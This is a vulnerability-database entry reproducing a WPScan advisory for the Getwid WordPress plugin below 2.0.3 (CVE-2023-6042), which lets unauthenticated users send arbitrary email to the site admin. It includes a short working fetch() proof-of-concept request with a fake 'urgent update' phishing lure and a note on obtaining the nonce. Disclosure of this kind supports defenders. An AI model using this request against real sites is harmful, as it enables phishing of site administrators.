Lucene search
Krzysztof Zając (CERT PL)WPVDB-ID:56A1C050-67B5-43BC-B5B6-28D9A5A59EBAHistoryDec 16, 2023 - 12:00 a.m.
Getwid < 2.0.3 - Unauthenticated Arbitrary Email Sending to Admin
2023-12-1600:00:00
Krzysztof Zając (CERT PL)
wpscan.com
7
unauthenticated user access
arbitrary email sending
admin notification
content injection
security vulnerability
wordpress
Description Any unauthenticated user may send e-mail from the site with any title or content to the admin
PoC
fetch(“http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=getwid_send_mail”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “data[subject]=Urgent WordPress update neeeds to be installed&data;[message]=Fake notification for the admin with some link to be clicked&security;=4c71dae953”, /* the nonce is in the page source under recaptcha_v2_contact_form key */ “method”: “POST”, });
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 2.0.3 |
Related
prion
prion
Code injection
2024-01-08 19:15:00
nvd
nvd
CVE-2023-6042
2024-01-08 19:15:09
wpexploit
wpexploit
Getwid < 2.0.3 - Unauthenticated Arbitrary Email Sending to Admin
2023-12-16 00:00:00
cvelist
cvelist
cve
cve
CVE-2023-6042
2024-01-08 19:15:09
6.6 Medium
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
43.7%
Related for WPVDB-ID:56A1C050-67B5-43BC-B5B6-28D9A5A59EBA